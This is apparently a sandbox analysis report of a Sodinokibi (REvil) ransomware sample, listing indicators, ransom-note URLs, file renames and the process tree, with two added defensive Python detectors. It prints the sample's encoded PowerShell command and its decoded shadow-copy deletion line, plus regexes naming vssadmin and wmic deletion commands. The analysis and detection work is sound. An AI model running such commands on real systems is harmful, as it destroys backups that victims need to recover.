Analysis
max time kernel: 136s
max time network: 142s
platform: windows10_x64
resource: win10
submitted: 29-07-2020 14:01
Static task: static1
Behavioral task: behavioral1
  Sample: 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe
  Resource: win10
General
Target: 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe
Size: 116KB
MD5: 995f73ab9fe101249465c0514da4ec71
SHA1: 6fab598e7536cab36e79b7fd3ca6581e4e806936
SHA256: 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87
SHA512: 8eb0573532a53b82e87741466c57d467c929cb5d3d7de9726e14a7ddae410e1c4da162c21c7cef2c5936ade7fc8ae28cb5e4804399b38ad1e4e0433032c43503
Malware Config
Extracted from: C:\v4up0-readme.txt
Family: sodinokibi
URLs:
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8856FFD5E2C6C8D5
  http://decryptor.cc/8856FFD5E2C6C8D5
Signatures

Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes (pid, process):
  720  96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe
  720  96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe
  364  powershell.exe
  364  powershell.exe
  364  powershell.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes (description, ioc, process):
  Set value (str)  \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\g854k5.bmp"  96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe
Enumerates connected drives (3 TTPs)
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes (description, pid, process):
  Token: SeDebugPrivilege         720  96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe
  Token: SeDebugPrivilege         364  powershell.exe
  Token: SeBackupPrivilege        936  vssvc.exe
  Token: SeRestorePrivilege       936  vssvc.exe
  Token: SeAuditPrivilege         936  vssvc.exe
  Token: SeTakeOwnershipPrivilege 720  96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe
Suspicious use of WriteProcessMemory (2 IoCs)
Processes (description, pid, process, target process):
  PID 720 wrote to memory of 364  720  96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe  powershell.exe
  PID 720 wrote to memory of 364  720  96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe  powershell.exe
Drops file in Program Files directory (19 IoCs)
Processes (description, ioc, process), all by 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe:
  File opened for modification  \??\c:\program files\UndoSet.au3
  File opened for modification  \??\c:\program files\CompleteReset.jpeg
  File opened for modification  \??\c:\program files\ConfirmClear.potm
  File opened for modification  \??\c:\program files\RevokeConfirm.reg
  File opened for modification  \??\c:\program files\StartUnregister.docx
  File opened for modification  \??\c:\program files\SwitchExpand.xps
  File opened for modification  \??\c:\program files\JoinGroup.docx
  File opened for modification  \??\c:\program files\RevokeGroup.clr
  File created                  \??\c:\program files\v4up0-readme.txt
  File created                  \??\c:\program files (x86)\v4up0-readme.txt
  File opened for modification  \??\c:\program files\AssertSplit.potx
  File opened for modification  \??\c:\program files\ConvertFromGroup.bmp
  File opened for modification  \??\c:\program files\GroupSend.vb
  File opened for modification  \??\c:\program files\CompressCopy.ods
  File opened for modification  \??\c:\program files\RedoLimit.iso
  File opened for modification  \??\c:\program files\ResumeWatch.css
  File opened for modification  \??\c:\program files\CompareDisable.vssm
  File opened for modification  \??\c:\program files\ExitApprove.jpeg
  File opened for modification  \??\c:\program files\WatchOut.mpeg3
Modifies extensions of user files (5 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes (description, ioc, process), all by 96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe:
  File renamed  C:\Users\Admin\Pictures\FindClear.png => \??\c:\users\admin\pictures\FindClear.png.v4up0
  File renamed  C:\Users\Admin\Pictures\SearchCheckpoint.png => \??\c:\users\admin\pictures\SearchCheckpoint.png.v4up0
  File renamed  C:\Users\Admin\Pictures\CompareOptimize.png => \??\c:\users\admin\pictures\CompareOptimize.png.v4up0
  File renamed  C:\Users\Admin\Pictures\GroupDismount.tif => \??\c:\users\admin\pictures\GroupDismount.tif.v4up0
  File renamed  C:\Users\Admin\Pictures\ExitOpen.png => \??\c:\users\admin\pictures\ExitOpen.png.v4up0
Family: Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
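Added example, not part of the sandbox report or the sample: a small Python heuristic that replays the file events listed under "Modifies extensions of user files" and "Drops file in Program Files directory" and flags the pattern a ransomware rule keys on: several user files renamed by appending one new suffix (.v4up0 here), plus note files carrying the same tag dropped into multiple directories. The event lists are constructed from the report's own entries; the threshold, the readme-matching rule and the function names are this example's assumptions.

```python
import ntpath
from collections import Counter

# File events constructed from the report's "Modifies extensions of user files"
# and "Drops file in Program Files directory" signatures: (old path, new path).
RENAME_EVENTS = [
    (r"C:\Users\Admin\Pictures\FindClear.png", r"\??\c:\users\admin\pictures\FindClear.png.v4up0"),
    (r"C:\Users\Admin\Pictures\SearchCheckpoint.png", r"\??\c:\users\admin\pictures\SearchCheckpoint.png.v4up0"),
    (r"C:\Users\Admin\Pictures\CompareOptimize.png", r"\??\c:\users\admin\pictures\CompareOptimize.png.v4up0"),
    (r"C:\Users\Admin\Pictures\GroupDismount.tif", r"\??\c:\users\admin\pictures\GroupDismount.tif.v4up0"),
    (r"C:\Users\Admin\Pictures\ExitOpen.png", r"\??\c:\users\admin\pictures\ExitOpen.png.v4up0"),
]
CREATED_FILES = [
    r"\??\c:\program files\v4up0-readme.txt",
    r"\??\c:\program files (x86)\v4up0-readme.txt",
]


def appended_suffix(old_path, new_path):
    """Return the suffix a rename appended to the original file name, or None.

    Compared on the base name and case-insensitively: the sandbox logs the
    target as an NT object path in lower case while the source is the Win32
    path, so a whole-path comparison would never match.
    """
    old_name = ntpath.basename(old_path).lower()
    new_name = ntpath.basename(new_path).lower()
    if new_name.startswith(old_name) and len(new_name) > len(old_name):
        return new_name[len(old_name):]
    return None


def detect_ransomware_extension(renames, created, min_files=3):
    """Flag a mass rename that appends one new extension, plus matching note files.

    min_files is an assumed threshold for this example; a production rule would
    also bound the time window and the number of distinct directories touched.
    Returns None when no appended suffix reaches the threshold.
    """
    suffixes = Counter()
    for old_path, new_path in renames:
        suffix = appended_suffix(old_path, new_path)
        if suffix:
            suffixes[suffix] += 1
    if not suffixes:
        return None
    suffix, count = suffixes.most_common(1)[0]
    if count < min_files:
        return None
    # The note name reuses the extension tag (v4up0-readme.txt for .v4up0),
    # so created files whose name carries the tag are reported as ransom notes.
    tag = suffix.lstrip(".")
    notes = [p for p in created if tag in ntpath.basename(p).lower()]
    return {"extension": suffix, "renamed_files": count, "ransom_notes": notes}


if __name__ == "__main__":
    print(detect_ransomware_extension(RENAME_EVENTS, CREATED_FILES))
```

Run against the report's events this returns the .v4up0 extension, five renamed files and both v4up0-readme.txt drops; a rename that changes the stem rather than appending a suffix yields no suffix and does not count.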
Modifies service (2 TTPs, 5 IoCs)
Processes (description, ioc, process), all by vssvc.exe:
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
Processes

C:\Users\Admin\AppData\Local\Temp\96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\96dde0a25cc6ca81a6d3d5025a36827b598d94f0fca6ab0363bfc893706f2e87.bin.exe"
  PID: 720
  - Suspicious behavior: EnumeratesProcesses
  - Sets desktop wallpaper using registry
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - Drops file in Program Files directory
  - Modifies extensions of user files

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 720)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      PID: 364
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 3848

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 936
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service
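Added example, not code from the report or from the sample: the child powershell.exe above is started with -e, an accepted abbreviation of -EncodedCommand, whose argument is the script as UTF-16LE text, base64-encoded. Decoding the string shown in the tree gives Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, which deletes every Volume Shadow Copy through WMI and is consistent with the vssvc.exe and unsecapp.exe (WMI callback host) activity recorded in the same tree. The Python below decodes such a command line and matches the result against common shadow-copy-deletion patterns. The sample command line is copied from the report; the whitespace tokenising, the pattern set and its labels, and the function names are this example's own assumptions.

```python
import base64
import re

# Command line of the child powershell.exe, copied from the sandbox report's process tree.
SAMPLE_CMDLINE = (
    "powershell -e "
    "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAA"
    "RgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

# Shadow-copy deletion patterns; the labels are this example's own names, not report signatures.
SHADOW_COPY_PATTERNS = {
    "wmi_shadowcopy_delete": re.compile(r"win32_shadowcopy.*?\.delete\s*\(", re.I | re.S),
    "vssadmin_delete_shadows": re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    "wmic_shadowcopy_delete": re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
}


def extract_encoded_command(cmdline):
    """Return the base64 argument following an -EncodedCommand switch, or None.

    powershell.exe accepts any unambiguous prefix of the switch name (-e, -ec,
    -enc, ...), so the check is "is this token a prefix of encodedcommand".
    Splitting on whitespace is enough here: the switch and the base64 payload
    are each a single token, whatever quoting the rest of the line uses.
    """
    tokens = cmdline.split()
    for i in range(len(tokens) - 1):
        switch = tokens[i].lower()
        if switch.startswith("-") and len(switch) > 1 and "encodedcommand".startswith(switch[1:]):
            return tokens[i + 1]
    return None


def decode_encoded_command(b64):
    """Decode an -EncodedCommand payload (base64 of UTF-16LE text); None if malformed."""
    try:
        raw = base64.b64decode(b64, validate=True)
        return raw.decode("utf-16-le").rstrip("\x00")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze_command_line(cmdline):
    """Decode any -EncodedCommand payload and report shadow-copy deletion indicators.

    Returns {"source": "encoded" or "plain", "script": text or None,
    "indicators": [pattern labels that matched]}. Plain command lines are
    scanned as-is so vssadmin/wmic variants are caught too.
    """
    b64 = extract_encoded_command(cmdline)
    if b64 is None:
        source, script = "plain", cmdline
    else:
        source, script = "encoded", decode_encoded_command(b64)
        if script is None:
            # An -e switch with a payload that does not decode is itself worth flagging.
            return {"source": source, "script": None, "indicators": ["undecodable_encoded_command"]}
    hits = [name for name, rx in SHADOW_COPY_PATTERNS.items() if rx.search(script)]
    return {"source": source, "script": script, "indicators": hits}


if __name__ == "__main__":
    result = analyze_command_line(SAMPLE_CMDLINE)
    print(result["script"])
    print("indicators:", ", ".join(result["indicators"]) or "none")
```

The decoded script is what an EDR rule on process creation events should be matching; matching only on the raw command line misses it entirely because the base64 text contains none of the keywords. Note that the trailing-null strip is defensive: PowerShell does not require a terminator, and this payload decodes cleanly without one.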